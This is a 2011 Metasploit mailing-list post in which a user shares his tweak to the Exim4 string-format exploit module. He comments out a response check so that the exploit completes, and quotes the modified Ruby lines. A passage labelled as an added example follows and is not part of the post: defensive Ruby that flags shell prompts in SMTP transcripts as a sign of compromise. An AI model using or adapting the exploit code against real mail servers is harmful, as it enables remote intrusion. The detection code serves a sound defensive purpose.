Metasploit mailing list archives

Bug in exim4_string_format.rb


From: Ty Miller <tyronmiller () gmail com>
Date: Fri, 17 Jun 2011 15:45:48 +1000

Hey guys,

I had to make a small tweak to the exploit
module msf3/modules/exploits/unix/smtp/exim4_string_format.rb to make it
work on a system that I exploited recently ...

                print_status("Sending second message ...")
                buf = raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
                # Should be: "sh-x.x$ " !!
                print_status("MAIL result: #{buf.inspect}") if buf

                buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
                # Should be: "sh: RCPT: command not found\n"
                if buf
                        print_status("RCPT result: #{buf.inspect}")
                        if buf !~ /RCPT/
                                print_error("Ty: Skipping over RCPT check exploit bug")
                                # raise RuntimeError, 'Something went wrong, perhaps this host is patched?'
                        end
                end

The sh-x.x part was being received when RCPT was expected in the module, so
by commenting it out the module didn't terminate and the exploit worked.

Thx,
Ty
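The exchange above, seen from the defender's side: an Exim4 MTA that answers "sh-x.x$ " or "sh: RCPT: command not found" to SMTP commands is no longer speaking SMTP at all, and that is a strong compromise indicator in any captured session. The following is an added example (not code from the post or from the Metasploit module) that scans a constructed SMTP transcript and flags server output that is a shell prompt or a shell error instead of an RFC 5321 three-digit reply. The prompt pattern and the transcript contents are assumptions chosen to mirror the strings quoted in the post.

```ruby
# Added example, not part of the original post or the Metasploit module.
# Classifies SMTP server output and flags shell-like responses, which
# indicate an MTA process that has been replaced by a shell.

# A legitimate SMTP reply starts with a three-digit code (RFC 5321).
SMTP_REPLY   = /\A\d{3}[ -]/
# Shell prompt such as "sh-3.2$ " (pattern is an assumption; the post
# quotes the prompt as "sh-x.x$ ").
SHELL_PROMPT = /\A(?:sh|bash)-[\d.]+\$ /
# Shell error such as "sh: RCPT: command not found".
SHELL_ERROR  = /\A\S+: .+: command not found/

# Returns a symbol describing one chunk of server output.
def classify_response(buf)
  return :empty        if buf.nil? || buf.empty?
  return :smtp_reply   if buf =~ SMTP_REPLY
  return :shell_prompt if buf =~ SHELL_PROMPT
  return :shell_error  if buf =~ SHELL_ERROR
  :unknown
end

# Scans a transcript given as an array of [direction, text] pairs and
# returns every server chunk that looks like a shell rather than SMTP.
# The index of the preceding client command is recorded so an analyst
# can see which SMTP verb the "server" tried to run as a shell command.
def scan_transcript(transcript)
  findings = []
  last_client = nil
  transcript.each_with_index do |(dir, text), i|
    if dir == :client
      last_client = i
      next
    end
    kind = classify_response(text)
    next unless [:shell_prompt, :shell_error].include?(kind)
    findings << { line: i, kind: kind, text: text, after_client: last_client }
  end
  findings
end

# Constructed sample transcript mirroring the exchange described in the
# post: the banner is normal SMTP, but MAIL FROM is answered with a shell
# prompt and RCPT TO with a shell error.
SAMPLE_TRANSCRIPT = [
  [:server, "220 mail.example.test ESMTP\r\n"],
  [:client, "MAIL FROM: <a@example.test>\r\n"],
  [:server, "sh-3.2$ "],
  [:client, "RCPT TO: <b@example.test>\r\n"],
  [:server, "sh: RCPT: command not found\n"],
]

if __FILE__ == $PROGRAM_NAME
  scan_transcript(SAMPLE_TRANSCRIPT).each do |f|
    puts "server chunk #{f[:line]} (after client line #{f[:after_client]}): " \
         "#{f[:kind]} #{f[:text].inspect}"
  end
end
```

Because the prompt and the error may arrive fused in one read (the post's symptom is the prompt turning up in the read that was expected to hold the RCPT error), both patterns are anchored at the start of a chunk only, and a fused chunk such as "sh-3.2$ sh: RCPT: command not found" is still reported as a shell prompt.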
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework